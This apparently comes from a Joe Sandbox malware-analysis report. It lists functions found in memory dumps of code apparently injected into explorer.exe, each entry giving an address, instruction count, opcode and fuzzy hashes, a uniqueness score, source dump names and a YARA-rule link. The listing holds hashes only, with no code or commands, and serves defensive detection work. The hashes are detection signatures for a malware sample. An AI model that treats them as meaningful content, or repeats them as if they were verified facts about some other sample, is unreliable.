Opcode ID: 848cd19c41e8f1a883d9d8e743190ea50a515ccc698267323bcf903db2b34fcf
Instruction ID: 90a2364a440eaa101a18463fd0b90be98fbe13e6a82c8aeebc8fc720d8e4e288
Opcode Fuzzy Hash: 848cd19c41e8f1a883d9d8e743190ea50a515ccc698267323bcf903db2b34fcf
Instruction Fuzzy Hash: D241EC2290D1BA4AE702F73CE8561FAFB60DF52724B1901B7D08CC9163ED19588AC765

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017EC168 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384727923.00007FFC017EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017ea000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e57d4ba9e067ed91358c6e5836735214fd3b84dd412d2d5995e775e0f04ef1cb
Instruction ID: 70cbe5fe739fc9b451529e8f0f198f7e5acdaa51077cd5d1ca6780f71b445d8f
Opcode Fuzzy Hash: e57d4ba9e067ed91358c6e5836735214fd3b84dd412d2d5995e775e0f04ef1cb
Instruction Fuzzy Hash: 89412A2694C57E86EB0A7ABCB8061FDF7D4DF4AB31F050277E44CC5093DE24248AC6A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017F1CFD Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384876032.00007FFC017F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017f1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b03b2249c81caf212c8ceefd69a3ffec25dd3ed328b4ad367e08bb7641dd186c
Instruction ID: 071e5fed9b088a9ddf04ba8f609b1c4014c1d6810e403f3356f19fe9aae4a213
Opcode Fuzzy Hash: b03b2249c81caf212c8ceefd69a3ffec25dd3ed328b4ad367e08bb7641dd186c
Instruction Fuzzy Hash: F4413C70D1866D8FEB84EBA8C8556EDB7F5FF58700F500179E009E7292CE746841CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017F220A Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384876032.00007FFC017F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017f1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 774deb53dbaf7fdaaf3752efd8fdbc2b9a194b0eb986b8c27729bc5d2ad84060
Instruction ID: ae88fc245fe798236be111c4433dc2c5c0706e896f041a3e74ee83165ad3409a
Opcode Fuzzy Hash: 774deb53dbaf7fdaaf3752efd8fdbc2b9a194b0eb986b8c27729bc5d2ad84060
Instruction Fuzzy Hash: 05319070D5852E8BDBA4EB58C885BEDB7B1BF58300F5041B9D00DE2292DB346E81CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017EBAF6 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384727923.00007FFC017EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017ea000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d16b6a3e254efc142ddd40687cccd5e004fb01ca884d317e9db0e55c4e7d1bda
Instruction ID: c61e98aee83642c0e0526b7553bd4c9db277b8956f5a5b67c262e1dd533837d8
Opcode Fuzzy Hash: d16b6a3e254efc142ddd40687cccd5e004fb01ca884d317e9db0e55c4e7d1bda
Instruction Fuzzy Hash: 49217074E1892D8FEF94EBA898556BCBBF1FF99700F50112AD00DE7296DE246842CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017EAA80 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384727923.00007FFC017EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017ea000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40c1f1e1b424847e3e7d0f0de1e246babaabf440044cd8bbe73c29cf049f4f80
Instruction ID: aaef2cb83a3e1039830eca6242cda5b7ee878fc76c40df274a2409d08e695c5c
Opcode Fuzzy Hash: 40c1f1e1b424847e3e7d0f0de1e246babaabf440044cd8bbe73c29cf049f4f80
Instruction Fuzzy Hash: 9231D87091892D8EEBE4EB18C885BE8B7E5FF58701F5046A6C00DE3252DE34A986CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017EA8A5 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384727923.00007FFC017EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017ea000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be0944b8fea0ab4da6cfee9a752edf050b263151e1867d7da8d3affc1c9c172b
Instruction ID: 74c0a89ac2931ddafb6da3afe06ccf3761238bea13d56e7748c5bb8880966266
Opcode Fuzzy Hash: be0944b8fea0ab4da6cfee9a752edf050b263151e1867d7da8d3affc1c9c172b
Instruction Fuzzy Hash: 9721BD34C1C69E8FEB59EF2888592B9BBE0EF58700F4104BAD40DC7193EE28A451C721

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E32A6 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384451255.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017e0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7ba94d652873832cf97b35ee3f4f07ffcee45e5a91668a7b4df4740ecb4c3bd
Instruction ID: 914c141dfef4c33496ef299be972036f095f28e4f79abb1293b36d83acf516e0
Opcode Fuzzy Hash: e7ba94d652873832cf97b35ee3f4f07ffcee45e5a91668a7b4df4740ecb4c3bd
Instruction Fuzzy Hash: 1221A670D0852D8FEB54EBA8C485AEDB7F5FF58701F10417AD009E7292CA39A981CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017EA831 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384727923.00007FFC017EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017ea000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7483599cb79ebcc4641b65141650836c0117f3a6f660f33d5e868fd91ffcc872
Instruction ID: 1b17a024ba01556f6c9c42ad9426a534c73077d554d5969b8adbd826a76055ad
Opcode Fuzzy Hash: 7483599cb79ebcc4641b65141650836c0117f3a6f660f33d5e868fd91ffcc872
Instruction Fuzzy Hash: 0B118170D9C65E8FE752EF2888891F9BBE0EF59B01F5145B6D40CC3093EE38A552C660

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017F1C64 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384876032.00007FFC017F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017f1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07fc41aa9e7c95aa2596f1ccdce3838b29aaeb94d3fe4909477459f91ed31175
Instruction ID: 02c83e85e5fb0d667ed2ba7b469f726febd4ba73e7deb1a846c42f38ac7c9a1a
Opcode Fuzzy Hash: 07fc41aa9e7c95aa2596f1ccdce3838b29aaeb94d3fe4909477459f91ed31175
Instruction Fuzzy Hash: 7A21AF3180E7E98FD7469B2488692F67FF0AF16214F4900FFD44ACA0E3DA295846C721

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017F6361 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384876032.00007FFC017F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017f1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90d3d88e620665a456bd35500fd67a26c00e3ecd830ca1bbda0d75a5378c7340
Instruction ID: f72103c1a4880cfaf6e29e90185570d2a745351a7a7c7e8ab31ba60377ccdc26
Opcode Fuzzy Hash: 90d3d88e620665a456bd35500fd67a26c00e3ecd830ca1bbda0d75a5378c7340
Instruction Fuzzy Hash: C111AF7090866E8FEB89EF2884592BABBA0FF69315F1005BEE00DC7192DE34A545C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017F1A71 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384876032.00007FFC017F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017f1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb81861142068654ad5fa9af893aa78e91e356f5bf2f9bc5c3713d15694fa0b0
Instruction ID: 10f4070e3a1e9b9efb11b21a5a2f668f2a1bb0506a9d966a0e96781b4d942681
Opcode Fuzzy Hash: fb81861142068654ad5fa9af893aa78e91e356f5bf2f9bc5c3713d15694fa0b0
Instruction Fuzzy Hash: 1B11BB309086AD8FDB48DF28C4955FA7BE1FF58704F5002BEE80AC3282DA34A545CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017F3AB5 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384876032.00007FFC017F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017f1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d8f57e50cef737980346425dc043b11cedca41039479a145899e581f695b637
Instruction ID: b2dd7596579e399fff98447d9128a789722e36390129c1c4a6a2f93c2c644c01
Opcode Fuzzy Hash: 6d8f57e50cef737980346425dc043b11cedca41039479a145899e581f695b637
Instruction Fuzzy Hash: CC11B170D08A6E8FEB99EF6884692FA7BA0FF58301F1001BED40DC7292DB74A545C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E338E Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384451255.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017e0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f724ad30563a181c65ed89d49f91147a742ec253fdee7b50dba9b6d2971b641
Instruction ID: e5c75b52eba4819e35568cd80dcb6d6803e78cb3835e2e629f3e7f8f97d238cd
Opcode Fuzzy Hash: 0f724ad30563a181c65ed89d49f91147a742ec253fdee7b50dba9b6d2971b641
Instruction Fuzzy Hash: 2011A33085D66E8FEB42EB748848AEA7BF4FF4A305F0505B6D418C7163DA389546C721

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017EA790 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384727923.00007FFC017EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017ea000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4032c42b293726c98af4368d1822a4e808c57da1846bd0a31da4cd391806a492
Instruction ID: 6da7a8ab746e3cc0cfa0029569e3cd8ffcd3b8b013fd1b991e41c0ce37b44534
Opcode Fuzzy Hash: 4032c42b293726c98af4368d1822a4e808c57da1846bd0a31da4cd391806a492
Instruction Fuzzy Hash: D421DF60D4C66E8EEB51EB2C88481F9BBF0EF19700F0505B6D00EC71A3EE34A945C760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017F3A19 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384876032.00007FFC017F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017f1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2b13b0514f6df7ee3cb2b8cf6e33d7f1bd57298a42fcaa2798fcad31c29914c
Instruction ID: 5fa04a5fd2ba4177b3cf38a92b71990fd8025006c50014b15ff11a771024a45c
Opcode Fuzzy Hash: f2b13b0514f6df7ee3cb2b8cf6e33d7f1bd57298a42fcaa2798fcad31c29914c
Instruction Fuzzy Hash: 8221C070C0C66E8FEB89EF6884592BA7BA0FF59305F1401BEE00DC7292DA34A545C751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E0D1D Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384451255.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017e0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9eba8bf876ffe24c4916d4cb214c7df143e3f7f05fe262ec728689e9ebdd7be
Instruction ID: 589d968c91aed4c850ac9c9084b07910be99db8a72b8a43cbaee05aa5ec9fa55
Opcode Fuzzy Hash: e9eba8bf876ffe24c4916d4cb214c7df143e3f7f05fe262ec728689e9ebdd7be
Instruction Fuzzy Hash: EE11D030E0C56E8EEB55EB6C88582FDBBE0FF69710F0000BAD009C60D3DAB66485C310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017F4369 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384876032.00007FFC017F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017f1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11d763c389a6840216a285be61c7c13b874c490f1d164c5fd9b0aecd328dd591
Instruction ID: db3d03aae48b1c4c0b956398acff100fceea757d7bdfe90471bd7b0c65ec0ffe
Opcode Fuzzy Hash: 11d763c389a6840216a285be61c7c13b874c490f1d164c5fd9b0aecd328dd591
Instruction Fuzzy Hash: 76119D3090866E8FEB89EB6888592BABBF0FF19705F0105BBD40ED7193DA346545C721

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017F6AA1 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384876032.00007FFC017F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017f1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29e7eb3399d7536652849a090a5315f87f3ca228bdb7d36c262743187450bd53
Instruction ID: 37daac71d11492d68f372d7bb5c94d0f0bf1941a37aa7bae5454a76487734951
Opcode Fuzzy Hash: 29e7eb3399d7536652849a090a5315f87f3ca228bdb7d36c262743187450bd53
Instruction Fuzzy Hash: 0411523090D56E8FEB51EB7988485ABBBF0FF15701F0445BAE419C7052EE34A546C761

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E0AED Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384451255.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017e0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cfe0bfaf0bb76b1869ce95de4576dc4e7c00bfb09af98a9065bb82e3e61c7be
Instruction ID: 06b01a98f9981da54885c232678da2bcb4faf55310eaa69ffa52164c28e15a13
Opcode Fuzzy Hash: 8cfe0bfaf0bb76b1869ce95de4576dc4e7c00bfb09af98a9065bb82e3e61c7be
Instruction Fuzzy Hash: 53118130A0851ECFEB54EB58C884BEEB3E6FF58300F104275D00AD7196CE74A982CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017F1F98 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384876032.00007FFC017F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017f1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4927946028e5323527aa8faf2c4c0d3a2d947fe5e596f0cc87e03de52277eb01
Instruction ID: 28f5a1729c334fdea18691127b7b0fa88a4d362833a5b4b23e63ac1a90de5635
Opcode Fuzzy Hash: 4927946028e5323527aa8faf2c4c0d3a2d947fe5e596f0cc87e03de52277eb01
Instruction Fuzzy Hash: 94119E30918A2E8FEB98FF6884592BEB7A2FF58705F10057EE41DC3192CE346645CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017F473A Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384876032.00007FFC017F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017f1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0675a487937356f1aaaa77d5b05757e840755dd0afcedb45bd3b5f028d389a07
Instruction ID: 3bce2c6e2d45bc324cafde5e9191bbec20afe7e4f2120311e954c36fc7675343
Opcode Fuzzy Hash: 0675a487937356f1aaaa77d5b05757e840755dd0afcedb45bd3b5f028d389a07
Instruction Fuzzy Hash: B911517190896D8FDB50EB6C9846AFEBBF1EF59720F0002A9C01DE3186CA3468418B50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017EB935 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384727923.00007FFC017EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017ea000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d65d426ba84e7913d07c2e94f66d4f9c0ab7af86346b8cf9799fd6715f506b5e
Instruction ID: 373227d37403f71ff5228e156cfaaa78ee708e9876f915fb7b4dd250799db664
Opcode Fuzzy Hash: d65d426ba84e7913d07c2e94f66d4f9c0ab7af86346b8cf9799fd6715f506b5e
Instruction Fuzzy Hash: 3211793090866ECFEB88EF2884992BEBBE0FF58701F0004BAD409C7192DA35A541C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017EB565 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384727923.00007FFC017EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017ea000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1800a720f71ba694b1f697f4b6a421f65131f715ed4349b23aa9705793c2e8b
Instruction ID: 94f05c15c471c0cfcc3d54669df921fc3e0b017f66e71eebc16ed3ef120025c3
Opcode Fuzzy Hash: a1800a720f71ba694b1f697f4b6a421f65131f715ed4349b23aa9705793c2e8b
Instruction Fuzzy Hash: FD118E7090866E8FEB88EF6884592BDBBE0FF19701F6004BAD40DC7192DA35A541CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017F5669 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384876032.00007FFC017F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017f1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41e4989a1b3395d3bba8d8119dbd978f9f85e0f0db08294fb8b8664493949b6d
Instruction ID: 4d02b194324f276aa2f07c087edf62b6bf4f52f7b4363cbb4b67aea25b70cbdc
Opcode Fuzzy Hash: 41e4989a1b3395d3bba8d8119dbd978f9f85e0f0db08294fb8b8664493949b6d
Instruction Fuzzy Hash: 2311917090D6AE8FE781EB7888585BABBF0FF15701F0505BAD418C71A3EE34A444C751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017F653D Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384876032.00007FFC017F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017f1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66c857050fe104f1fe0c1e72905b1d08a705b7c339286dda184594840a224fd7
Instruction ID: f4c9e012b318a01e7f4d5641287aa9f4a9b7ac654de22618c090ad8740005c0b
Opcode Fuzzy Hash: 66c857050fe104f1fe0c1e72905b1d08a705b7c339286dda184594840a224fd7
Instruction Fuzzy Hash: 6111C17090C66E8FDB98EF6884592BABBA0FF58700F6001BEE00DC7197CE34A545C751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017F407D Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384876032.00007FFC017F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017f1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8c000f76afa2decda7381ac41e31dda35e80b90693f4379c12439d895777900
Instruction ID: fe88ebc2b9db77aa02e75726aaceeb573923f2fbdef62d8e37667b613bcd2d1a
Opcode Fuzzy Hash: a8c000f76afa2decda7381ac41e31dda35e80b90693f4379c12439d895777900
Instruction Fuzzy Hash: 3C116A7080866E8FEB99EB6888596BBBBA0FF19704F0405BED00AC7193EE356455C761

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017F42DD Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384876032.00007FFC017F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017f1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6ee2fbdefc2eb1cdeb8f8cfcefa111fecddd0a62a3b5e9dda4f7ffd8f3e2daf
Instruction ID: af68aac62931ef61b23931f9df43d855aca8acccb508c65568598aa492e03c17
Opcode Fuzzy Hash: d6ee2fbdefc2eb1cdeb8f8cfcefa111fecddd0a62a3b5e9dda4f7ffd8f3e2daf
Instruction Fuzzy Hash: 03118F3090C6AE8FEB89EB6888596FBBBA0FF18305F4105BED40ED6193DE246541C751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E34A5 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384451255.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017e0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c0e5df433eb43202e2a5c31439d0882482c609adb15936880b3c5e3a473d7f1
Instruction ID: 7e01df46f0774f4f4a6ebef2b3dc6248f2195a11ad707e1fe5b38c373babc426
Opcode Fuzzy Hash: 6c0e5df433eb43202e2a5c31439d0882482c609adb15936880b3c5e3a473d7f1
Instruction Fuzzy Hash: 39118B3590869E8FEB99EF6884592BEBBE0FF19704F0005BED41AC7192DA39A541C710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E2DCA Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384451255.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017e0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14bbf3707552388cd45f8ca031ee8a8243ec7c1236d551374239974715dde821
Instruction ID: dcbd9e4f9a50bb00252e176c869d7d14f5852d93a6733078ee101dbac88793d8
Opcode Fuzzy Hash: 14bbf3707552388cd45f8ca031ee8a8243ec7c1236d551374239974715dde821
Instruction Fuzzy Hash: 07018C30D0D6AE8FEB55EB3888481A9BBF4EF1E700F0144BAD408C70A3DA38A455C721

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017F29D5 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384876032.00007FFC017F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017f1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a384b23dafb4d8f0ffd38b4f2d6a524e52144df9f4d81eec28647c87dc6e535b
Instruction ID: 8c33e19465db33e9cb8bc4bd07cf037f86f507d291a8541d95c65b9ed4fb503f
Opcode Fuzzy Hash: a384b23dafb4d8f0ffd38b4f2d6a524e52144df9f4d81eec28647c87dc6e535b
Instruction Fuzzy Hash: 50117C3090D66E8FEB55EB6888596AABBE0FF15704F0505BAD40CC71A3EE24E648C761

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017EBD79 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384727923.00007FFC017EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017ea000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7621e6e004197a6de2b582c90653e0c5565d6edfb343d1af5d831fc65a39fd81
Instruction ID: 64c399b6cb373192ea62689768d5c143a072eed92d8d23629579b96b8eeabaae
Opcode Fuzzy Hash: 7621e6e004197a6de2b582c90653e0c5565d6edfb343d1af5d831fc65a39fd81
Instruction Fuzzy Hash: 9E11C2309086AE8FDB49EF2884952F97FE1EF59301F5001BAD409C7092CA36A491C751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017F6405 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384876032.00007FFC017F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017f1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b8a9384ed231033d3effe73b0c6796eeab71d90ed5837347aceced33c1851d3
Instruction ID: aca60924895a2be4b41710f3dd2bd9d207ea8b7f81c1649239618cffcfe4fb4c
Opcode Fuzzy Hash: 5b8a9384ed231033d3effe73b0c6796eeab71d90ed5837347aceced33c1851d3
Instruction Fuzzy Hash: 8F01AD7090866E8FEF99EF28885A2FA7BA1FF14700F04057EE808C3192DB349545CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017F7321 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384876032.00007FFC017F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017f1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30219287df35abd295b698e0fbe3c2fc77e901c7a6d73b4b1cd6ad5df466efce
Instruction ID: 85ffac50736d551f6c45b7b64729939d1093f0f42f8de4858252c1b20e8dffdd
Opcode Fuzzy Hash: 30219287df35abd295b698e0fbe3c2fc77e901c7a6d73b4b1cd6ad5df466efce
Instruction Fuzzy Hash: 3101B1308096AE9FEB5DEF28849A1BA7BA0FF19704F5104BED809C6192EE75A541C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E05F1 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384451255.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017e0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc5799ead8d87a3736999037117f731c625ae4d8730c5d7c83e361622ffae996
Instruction ID: fbbe436d47bea872dba87a953d7e95ccd85625f842c5048becca9c1a31337668
